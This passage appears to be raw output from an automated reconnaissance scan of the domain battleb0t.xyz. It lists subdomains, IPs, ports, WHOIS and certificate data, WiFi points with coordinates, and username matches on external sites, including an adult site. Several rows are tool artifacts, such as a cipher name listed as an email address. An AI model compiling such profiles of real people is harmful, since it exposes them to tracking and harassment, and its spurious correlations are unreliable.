Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 10:44:03.648 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.73 | 34.74.170.74 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=Battleb0t | Battleb0t |
| 2023-05-12 03:00:00 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | [raw sandbox analysis dump omitted; truncated in source] |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com | [raw Censys host record omitted; truncated in source] |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent (Net ID: 00:14:5C:87:88:F8) | 50.8897, 6.0563 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.91): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:53 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14806242505', u'local_format': u'4806242505', u'number': u'14806242505', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14806242505 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D8:F1) | 32.8608, -79.9746 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UTAAPC (Net ID: 00:02:6F:3C:D0:53) | 37.7642, -122.3993 |
| 2023-05-12 02:53:39 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 8A7E:0CB6:1A24B9D:28318AF:645D907B
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 151
X-Served-By: cache-chi-klot8100035-CHI
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1683853586.391035,VS0,VE4
Vary: Accept-Encoding
X-Fastly-Request-ID: b0816cb365cc757f5f8cced0af110244f06dfba5
| 185.199.108.153 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/ayshoo | ayshoo |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00why00.github.io | 185.199.111.153 |
| 2023-05-12 02:54:22 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> | http://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys_SES_39246 (Net ID: 00:1C:10:3F:F6:58) | 32.8608, -79.9746 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:1F:E4) | 34.0544, -118.244 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.145): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:23 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.109.153 |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.111 | 35.229.48.116 |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01100111-01101001-01110100.github.io |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.85): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA (Net ID: 00:02:2D:20:CF:48) | 50.1188, 8.6843 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/ayshoo | ayshoo |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512 | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:45:57 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 2 | 0 | None | webroot.com [172.67.135.9] | 172.67.135.9 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:21 | 87.248.157.102 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.119 | 35.229.48.116 |
| 2023-05-12 02:56:58 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 3 | 0 | None | [raw Hybrid Analysis sandbox report omitted; truncated in source] | 35.229.48.116 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | fluid.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:B5:60) | 37.780462,-122.390564 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2053 | 104.21.6.166 |
| 2023-05-12 02:54:15 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | www.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | prv.pl (Category: tech)
https://www.prv.pl/osoba/login | login |
| 2023-05-12 02:45:42 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | San Francisco (South Beach), California, 94107, United States, North America | 185.199.108.153 |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 104.196.30.220 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.95): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 25 | 0 | 1 | 0 | None | nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 0263d4 (Net ID: 0C:EA:C9:05:4C:A3) | 37.751, -97.822 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=login | login |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.32): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | factory (Net ID: 00:01:03:7C:37:39) | 52.3759, 4.8975 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 006blog.github.io | 185.199.111.153 |
| 2023-05-12 02:54:22 | HTTP Status Code | No | Web Spider | 0 | 2 | 2 | 0 | None | 404 | http://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 121.48.229.35.bc.googleusercontent.com | 35.229.48.121 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Duolingo (Category: hobby)
https://www.duolingo.com/profile/login | login |
| 2023-05-12 02:54:21 | Linked URL - External | No | Web Spider | 0 | 0 | 4 | 0 | None | https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz | http://vscode.battleb0t.xyz/ |
| 2023-05-12 02:59:47 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | abuse@reg.ru | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5b6bb0ea398702-ORD"]} | 188.114.97.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:5E:30) | 41.8781, -87.6298 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.27): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.143): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:02:2D:45:26:C8) | 34.0544, -118.244 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.236): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:10 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | Rosemont, Illinois, 60018, United States, North America | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Ashburn, Virginia, VA, United States, US |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CoxWiFi (Net ID: 00:0D:67:8C:21:B4) | 39.0469, -77.4903 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:26 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com | 188.114.96.1 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | omlet (Category: gaming)
https://omlet.gg/profile/battleb0t | battleb0t |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet9102 (Net ID: 00:01:36:5B:91:00) | 34.0544, -118.244 |
| 2023-05-12 02:54:57 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3120::1:443 | 2a06:98c1:3120::1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | gjdsdnetwork (Net ID: 00:06:25:98:D4:36) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Cloud computing providers | battleb0t.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:A4:B5:6B) | 50.8897, 6.0563 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE169 (Net ID: 00:02:2D:8C:55:BE) | 37.7642, -122.3993 |
| 2023-05-12 02:56:27 | Hash | No | Hash Extractor | 0 | 0 | 3 | 0 | None | [MD5] 02ca825e4901e74c2c2d6f8e59341325 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:09:28 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:31:07:b9:c0:d0:b8:aa:df:7a:22:9b:22:71:4b:8d:b2:1d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 25 07:50:00 2023 GMT
Not After : Jul 24 07:49:59 2023 GMT
Subject: CN=donation.ecash-pay.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1F:4D:DC:19:88:72:CA:45:5D:51:D2:29:9C:6A:95:49:95:BE:55
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:donation.ecash-pay.com, DNS:www.donation.ecash-pay.com
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 25 08:50:00.708 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 25 08:50:00.710 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| 165.232.113.85 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D7:34) | 32.8608, -79.9746 |
| 2023-05-12 02:45:49 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 172.67.135.9 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | LiteSpeed Technologies LiteSpeed Web Server | 87.248.157.102 |
| 2023-05-12 02:54:27 | Raw Data from RIRs | No | Censys | 0 | 0 | 4 | 0 | None | (raw Censys JSON record omitted) | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | https://nwapi.battleb0t.xyz/ | nwapi.battleb0t.xyz |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 104.21.71.14 | battleb0t.xyz |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0047ol.github.io]
https://www.openphish.com/feed.txt | 0047ol.github.io |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 6 | 0 | None | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
